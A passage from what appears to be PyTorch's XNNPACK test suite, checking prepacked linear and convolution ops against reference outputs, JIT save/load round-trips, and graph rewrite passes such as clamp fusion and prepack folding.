kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
assume((output_pad_h < stride_h) and (output_pad_h < dilation))
assume((output_pad_w < stride_w) and (output_pad_w < dilation))
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((input_channels, output_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
# Note that groups/dilation is in reverse order from conv2d
ref_result = F.conv_transpose2d(input_data, weight, bias,
strides, paddings, output_paddings, groups, dilation)
packed_weight_bias = torch.ops.prepacked.conv2d_transpose_clamp_prepack(weight, bias,
strides, paddings,
output_paddings, dilations,
groups)
xnnpack_result = torch.ops.prepacked.conv2d_transpose_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result.contiguous(), xnnpack_result.contiguous(), rtol=1e-2, atol=1e-3)
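# The SerDes tests below repeat the op-level comparisons, but additionally
# round-trip each scripted module through torch.jit.save / torch.jit.load and
# re-check the outputs, verifying that prepacked weights survive serialization.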
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK; there does not seem to be a good reason for the failures.")
class TestXNNPACKSerDes(TestCase):
@given(batch_size=st.integers(0, 3),
data_shape=hu.array_shapes(1, 3, 2, 64),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear(self, batch_size, data_shape, weight_output_dim, use_bias):
class Linear(torch.nn.Module):
def __init__(self, weight, bias=None):
super(Linear, self).__init__()
self.weight = weight
self.bias = bias
def forward(self, x):
return F.linear(x, self.weight, self.bias)
class LinearPrePacked(torch.nn.Module):
def __init__(self, weight, bias=None):
super(LinearPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
def forward(self, x):
return torch.ops.prepacked.linear_clamp_run(x, self.packed_weight_bias)
data_shape = [batch_size] + list(data_shape)
weight = torch.rand((weight_output_dim, data_shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
scripted_linear = torch.jit.script(Linear(weight, bias))
scripted_linear_clamp_prepacked = torch.jit.script(LinearPrePacked(weight, bias))
input_data = torch.rand(data_shape)
ref_result = scripted_linear(input_data)
output_linearprepacked = scripted_linear_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand(data_shape)
buffer = io.BytesIO()
torch.jit.save(scripted_linear, buffer)
buffer.seek(0)
deserialized_linear = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_linear_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_linear_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_linear(input_data)
output_linearprepacked = deserialized_linear_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
use_bias,
format):
class Conv2D(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, dilations, groups):
super(Conv2D, self).__init__()
self.weight = weight
self.bias = bias
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias,
self.strides, self.paddings, self.dilations, self.groups)
class Conv2DPrePacked(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, dilations, groups):
super(Conv2DPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.conv2d_clamp_prepack(weight, bias,
strides, paddings, dilations, groups)
def forward(self, x):
return torch.ops.prepacked.conv2d_clamp_run(x, self.packed_weight_bias)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0] >=
dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1] >=
dilations[1] * (kernels[1] - 1) + 1)
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
scripted_conv2d = torch.jit.script(Conv2D(weight, bias,
strides, paddings, dilations, groups))
scripted_conv2d_clamp_prepacked = torch.jit.script(Conv2DPrePacked(
weight, bias, strides, paddings, dilations, groups))
ref_result = scripted_conv2d(input_data)
xnnpack_result = scripted_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d, buffer)
buffer.seek(0)
deserialized_conv2d = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_conv2d_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_conv2d(input_data)
xnnpack_result = deserialized_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
output_pad_h=st.integers(0, 2),
output_pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d_transpose(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
output_pad_h,
output_pad_w,
dilation,
use_bias,
format):
class Conv2DT(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, output_paddings, dilations, groups):
super(Conv2DT, self).__init__()
self.weight = weight
self.bias = bias
self.strides = strides
self.paddings = paddings
self.output_paddings = output_paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv_transpose2d(x, self.weight, self.bias,
self.strides, self.paddings, self.output_paddings, self.groups, self.dilations)
class Conv2DTPrePacked(torch.nn.Module):
def __init__(self, weight, bias, strides, paddings, output_paddings, dilations, groups):
super(Conv2DTPrePacked, self).__init__()
self.packed_weight_bias = torch.ops.prepacked.conv2d_transpose_clamp_prepack(weight, bias,
strides, paddings,
output_paddings,
dilations, groups)
def forward(self, x):
return torch.ops.prepacked.conv2d_transpose_clamp_run(x, self.packed_weight_bias)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0] >=
dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1] >=
dilations[1] * (kernels[1] - 1) + 1)
assume((output_pad_h < stride_h) and (output_pad_h < dilation))
assume((output_pad_w < stride_w) and (output_pad_w < dilation))
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((input_channels, output_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
scripted_conv2d = torch.jit.script(Conv2DT(weight, bias,
strides, paddings,
output_paddings, dilations, groups))
scripted_conv2d_clamp_prepacked = torch.jit.script(Conv2DTPrePacked(
weight, bias, strides, paddings, output_paddings, dilations, groups))
ref_result = scripted_conv2d(input_data)
xnnpack_result = scripted_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d, buffer)
buffer.seek(0)
deserialized_conv2d = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_conv2d_clamp_prepacked, buffer)
buffer.seek(0)
deserialized_conv2d_clamp_prepacked = torch.jit.load(buffer)
ref_result = deserialized_conv2d(input_data)
xnnpack_result = deserialized_conv2d_clamp_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
linear_weight_output_dim=st.integers(2, 64),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_combined_model(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
linear_weight_output_dim,
use_bias,
format):
class M(torch.nn.Module):
def __init__(self, conv_weight, conv_bias, linear_weight, linear_bias,
strides, paddings, dilations, groups):
super(M, self).__init__()
self.conv_weight = conv_weight
self.conv_bias = conv_bias
self.linear_weight = linear_weight
self.linear_bias = linear_bias
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
o = F.conv2d(x, self.conv_weight, self.conv_bias,
self.strides, self.paddings, self.dilations, self.groups)
o = o.permute([0, 2, 3, 1])
o = F.linear(o, self.linear_weight, self.linear_bias)
return F.relu(o)
class MPrePacked(torch.nn.Module):
def __init__(self, conv_weight, conv_bias, linear_weight, linear_bias,
strides, paddings, dilations, groups):
super(MPrePacked, self).__init__()
self.conv2d_clamp_run_weight_bias = \
torch.ops.prepacked.conv2d_clamp_prepack(conv_weight, conv_bias,
strides, paddings, dilations, groups)
self.linear_clamp_run_weight_bias = \
torch.ops.prepacked.linear_clamp_prepack(linear_weight, linear_bias)
def forward(self, x):
o = torch.ops.prepacked.conv2d_clamp_run(x, self.conv2d_clamp_run_weight_bias)
o = o.permute([0, 2, 3, 1])
o = torch.ops.prepacked.linear_clamp_run(o, self.linear_clamp_run_weight_bias)
return F.relu(o)
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
conv_weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
conv_bias = None
if use_bias:
conv_bias = torch.rand((output_channels))
# This is done just to find the output shape of the result
# so that the shape of weight for the following linear layer
# can be determined.
result = F.conv2d(input_data, conv_weight, conv_bias,
strides, paddings, dilations, groups)
linear_input_shape = result.shape[1]
linear_weight = torch.rand((linear_weight_output_dim, linear_input_shape))
linear_bias = None
if use_bias:
linear_bias = torch.rand((linear_weight_output_dim))
scripted_m = torch.jit.script(M(conv_weight, conv_bias, linear_weight,
linear_bias, strides, paddings, dilations, groups))
scripted_m_prepacked = torch.jit.script(
MPrePacked(
conv_weight,
conv_bias,
linear_weight,
linear_bias,
strides,
paddings,
dilations,
groups))
ref_result = scripted_m(input_data)
xnnpack_result = scripted_m_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
# Serialize the modules and then deserialize
input_data = torch.rand((batch_size, input_channels, height, width))
input_data = input_data.contiguous(memory_format=torch.channels_last)
buffer = io.BytesIO()
torch.jit.save(scripted_m, buffer)
buffer.seek(0)
deserialized_m = torch.jit.load(buffer)
buffer = io.BytesIO()
torch.jit.save(scripted_m_prepacked, buffer)
buffer.seek(0)
deserialized_m_prepacked = torch.jit.load(buffer)
ref_result = deserialized_m(input_data)
xnnpack_result = deserialized_m_prepacked(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
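# The rewrite-pass tests below check that torch._C._jit_pass_insert_prepacked_ops
# (optionally followed by module freezing, clamp fusion, and prepack folding)
# rewrites scripted/traced graphs as expected; FileCheck asserts on the
# resulting graph IR, and outputs are still compared numerically.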
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK; there does not seem to be a good reason for the failures.")
class TestXNNPACKRewritePass(TestCase):
@staticmethod
def validate_transformed_module(
# The first parameter is the module under test; it is named "self" to please flake8.
self,
pattern_count_map,
data_shape,
prepack_removal=False,
fuse_clamping_ops=False):
input_data = torch.normal(1, 20, size=data_shape)
for jit_method in ["script", "trace"]:
module_instance = self
if jit_method == "script":
scripted_model = torch.jit.script(module_instance)
else:
scripted_model = torch.jit.trace(module_instance, input_data)
scripted_model.eval()
ref_result = scripted_model(input_data)
torch._C._jit_pass_insert_prepacked_ops(scripted_model._c)
if fuse_clamping_ops or prepack_removal:
scripted_model._c = torch._C._freeze_module(scripted_model._c)
if fuse_clamping_ops:
torch._C._jit_pass_fuse_clamp_w_prepacked_linear_conv(scripted_model._c)
if (prepack_removal):
torch._C._jit_pass_fold_prepacking_ops(scripted_model._c)
buffer = io.BytesIO()
torch.jit.save(scripted_model, buffer)
buffer.seek(0)
deserialized_scripted_model = torch.jit.load(buffer)
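            # pattern_count_map semantics: v == 0 -> pattern must appear at
            # least once, v == -1 -> pattern must not appear, any other v ->
            # pattern must appear exactly v times.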
for pattern, v in pattern_count_map.items():
if (v == 0):
FileCheck().check(pattern).run(deserialized_scripted_model.graph)
elif (v == -1):
FileCheck().check_not(pattern).run(deserialized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_scripted_model.graph)
xnnpack_result = deserialized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
def test_linear(self):
data_shape = [2, 3, 32]
weight_output_dim = 24
weight_shape = (weight_output_dim, data_shape[-1])
class Linear(torch.nn.Module):
def __init__(self):
super(Linear, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
return F.linear(x, self.weight, self.bias)
class LinearNoBias(torch.nn.Module):
def __init__(self):
super(LinearNoBias, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
def forward(self, x):
return F.linear(x, self.weight, None)
# Linear with bias pattern.
pattern_count_map = {"Tensor = prim::CallFunction": -1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Linear(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(LinearNoBias(), pattern_count_map, data_shape)
# Conv params
batch_size = 2
input_channels_per_group = 6
height = 16
width = 16
output_channels_per_group = 6
groups = 4
kernel_h = kernel_w = 3
stride_h = stride_w = 1
pad_h = pad_w = 1
output_pad_h = output_pad_w = 0
dilation = 1
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
output_paddings = (output_pad_h, output_pad_w)
dilations = (dilation, dilation)
conv_weight_shape = (output_channels, input_channels_per_group, kernel_h, kernel_w)
conv_transpose_weight_shape = (input_channels, output_channels_per_group, kernel_h, kernel_w)
conv_bias_shape = (output_channels,)
class Conv2D(torch.nn.Module):
def __init__(self):
super(Conv2D, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias,
self.strides, self.paddings, self.dilations, self.groups)
class Conv2DT(torch.nn.Module):
def __init__(self):
super(Conv2DT, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_transpose_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.output_paddings = output_paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv_transpose2d(x, self.weight, self.bias,
self.strides, self.paddings, self.output_paddings, self.groups, self.dilations)
data_shape = (batch_size, input_channels, height, width)
pattern_count_map = {"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack": 1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Conv2D(), pattern_count_map, data_shape)
transpose_data_shape = (batch_size, input_channels, height, width)
transpose_pattern_count_map = {"Tensor = aten::conv_transpose2d": -1,
"prepacked::conv2d_transpose_clamp_prepack": 1,
"prepacked::conv2d_transpose_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(Conv2DT(), transpose_pattern_count_map, transpose_data_shape)
input_data = torch.rand((batch_size, input_channels, height, width))
conv_weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
conv_bias = torch.rand((output_channels))
result = F.conv2d(input_data, conv_weight, conv_bias,
strides, paddings, dilations, groups)
linear_input_shape = result.shape[1]
linear_weight_shape = (weight_output_dim, linear_input_shape)
class M(torch.nn.Module):
def __init__(self, activation_fn=F.relu):
super(M, self).__init__()
self.conv_weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.conv_bias = torch.nn.Parameter(torch.Tensor(torch.rand((conv_bias_shape))), requires_grad=False)
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
self.activation_fn = activation_fn
def forward(self, x):
o = F.conv2d(x, self.conv_weight, self.conv_bias,
self.strides, self.paddings, self.dilations, self.groups)
o = self.activation_fn(o)
o = o.permute([0, 2, 3, 1])
o = F.linear(o, self.linear_weight, self.linear_bias)
return self.activation_fn(o)
pattern_count_map = {"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack": 1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["Tensor = prim::CallFunction"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape, prepack_removal=True)
# Not inplace relu fusion test.
pattern_count_map = {"aten::relu": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(M(), pattern_count_map, data_shape, prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::relu"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Inplace relu fusion test.
pattern_count_map = {"aten::relu": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.relu_),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::relu"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.relu_),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Not inplace hardtanh fusion test.
pattern_count_map = {"aten::hardtanh": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::hardtanh"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
# Inplace hardtanh fusion test.
pattern_count_map = {"aten::hardtanh_": 2,
"prepacked::conv2d_clamp_prepack": -1,
"prepacked::conv2d_clamp_run": 1,
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh_),
pattern_count_map,
data_shape,
prepack_removal=True)
pattern_count_map["prepacked::conv2d_clamp_prepack"] = -1
pattern_count_map["prepacked::linear_clamp_prepack"] = -1
pattern_count_map["aten::hardtanh_"] = -1
TestXNNPACKRewritePass.validate_transformed_module(
M(F.hardtanh_),
pattern_count_map,
data_shape,
prepack_removal=True,
fuse_clamping_ops=True)
class MFusionAntiPattern(torch.nn.Module):
def __init__(self):
super(MFusionAntiPattern, self).__init__()
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
o = F.linear(x, self.linear_weight, self.linear_bias)
o = F.relu(o)
o = F.hardtanh(o)
return o
# Unfusable hardtanh.
pattern_count_map = {"aten::hardtanh": 1, # hardtanh cannot be.
"aten::relu": -1, # relu is fused.
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
MFusionAntiPattern(),
pattern_count_map,
(16, linear_weight_shape[1]),
prepack_removal=True,
fuse_clamping_ops=True)
class MFusionAntiPatternParamMinMax(torch.nn.Module):
def __init__(self):
super(MFusionAntiPatternParamMinMax, self).__init__()
self.linear_weight = torch.nn.Parameter(torch.Tensor(torch.rand(linear_weight_shape)), requires_grad=False)
self.linear_bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
self.strides = strides
self.paddings = paddings
self.dilations = dilations
self.groups = groups
def forward(self, x):
min = x[0, 0]
max = min + 10
o = F.linear(x, self.linear_weight, self.linear_bias)
o = F.hardtanh(o, min, max)
return o
# Unfusable hardtanh.
pattern_count_map = {"aten::hardtanh": 1, # hardtanh cannot be.
"prepacked::linear_clamp_prepack": -1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(
MFusionAntiPatternParamMinMax(),
pattern_count_map,
(16, linear_weight_shape[1]),
prepack_removal=True,
fuse_clamping_ops=True)
def test_decomposed_linear(self):
data_shape = [2, 32]
weight_output_dim = 24
weight_shape = (weight_output_dim, data_shape[-1])
class DecomposedLinearAddmm(torch.nn.Module):
def __init__(self):
super(DecomposedLinearAddmm, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
return torch.addmm(self.bias, x, weight_t)
class DecomposedLinearMatmulAdd(torch.nn.Module):
def __init__(self):
super(DecomposedLinearMatmulAdd, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
y = torch.matmul(x, weight_t)
res = y.add_(self.bias)
return res
class DecomposedLinearMatmul(torch.nn.Module):
def __init__(self):
super(DecomposedLinearMatmul, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand((weight_output_dim))), requires_grad=False)
def forward(self, x):
weight_t = self.weight.t()
res = torch.matmul(x, weight_t)
return res
# Linear with bias pattern.
pattern_count_map = {"Tensor = prim::CallFunction": -1,
"prepacked::linear_clamp_prepack": 1,
"prepacked::linear_clamp_run": 1}
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearAddmm(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearMatmulAdd(), pattern_count_map, data_shape)
TestXNNPACKRewritePass.validate_transformed_module(DecomposedLinearMatmul(), pattern_count_map, data_shape)
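# A hedged, minimal sketch (not exercised by these tests) of applying the same
# rewrite pipeline used in validate_transformed_module to an arbitrary eager
# module. `_example_apply_xnnpack_rewrites` and its `module` argument are
# hypothetical; the torch._C passes are exactly the ones invoked above.
def _example_apply_xnnpack_rewrites(module, fuse_clamping_ops=False):
    scripted = torch.jit.script(module)
    scripted.eval()
    # Rewrite eligible conv2d/linear calls into prepacked XNNPACK ops.
    torch._C._jit_pass_insert_prepacked_ops(scripted._c)
    # Freezing is a precondition for clamp fusion and prepack folding.
    scripted._c = torch._C._freeze_module(scripted._c)
    if fuse_clamping_ops:
        torch._C._jit_pass_fuse_clamp_w_prepacked_linear_conv(scripted._c)
    torch._C._jit_pass_fold_prepacking_ops(scripted._c)
    return scripted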
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN is not fork-safe since we're forking in a multi-threaded environment")
class TestXNNPACKConv1dTransformPass(TestCase):
@staticmethod
def validate_transform_conv1d_to_conv2d(
self,
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape):
input_data = torch.normal(1, 20, size=data_shape)
for jit_method in ["script", "trace"]:
module_instance = self
if jit_method == "script":
scripted_model = torch.jit.script(module_instance)
else:
scripted_model = torch.jit.trace(module_instance, input_data)
scripted_model.eval()
ref_result = scripted_model(input_data)
torch._C._jit_pass_transform_conv1d_to_conv2d(scripted_model._c)
optimized_scripted_model = optimize_for_mobile(scripted_model)
buffer = io.BytesIO()
torch.jit.save(scripted_model, buffer)
buffer.seek(0)
deserialized_scripted_model = torch.jit.load(buffer)
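# Same pattern-count convention as validate_transformed_module above:
# 0 -> must appear, -1 -> must be absent, otherwise an exact count.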
for pattern, v in pattern_count_transformed_map.items():
if v == 0:
FileCheck().check(pattern).run(deserialized_scripted_model.graph)
elif v == -1:
FileCheck().check_not(pattern).run(deserialized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_scripted_model.graph)
transformed_result = deserialized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, transformed_result, rtol=1e-2, atol=1e-3)
optimized_buffer = io.BytesIO()
torch.jit.save(optimized_scripted_model, optimized_buffer)
optimized_buffer.seek(0)
deserialized_optimized_scripted_model = torch.jit.load(optimized_buffer)
for pattern, v in pattern_count_optimized_map.items():
if v == 0:
FileCheck().check(pattern).run(deserialized_optimized_scripted_model.graph)
elif v == -1:
FileCheck().check_not(pattern).run(deserialized_optimized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_optimized_scripted_model.graph)
xnnpack_result = deserialized_optimized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
def test_conv1d_basic(self):
batch_size_list = range(1, 3)
input_channels_per_group_list = range(10, 12)
width_list = range(10, 12)
output_channels_per_group_list = range(10, 12)
groups_list = range(1, 3)
kernel_list = range(1, 4)
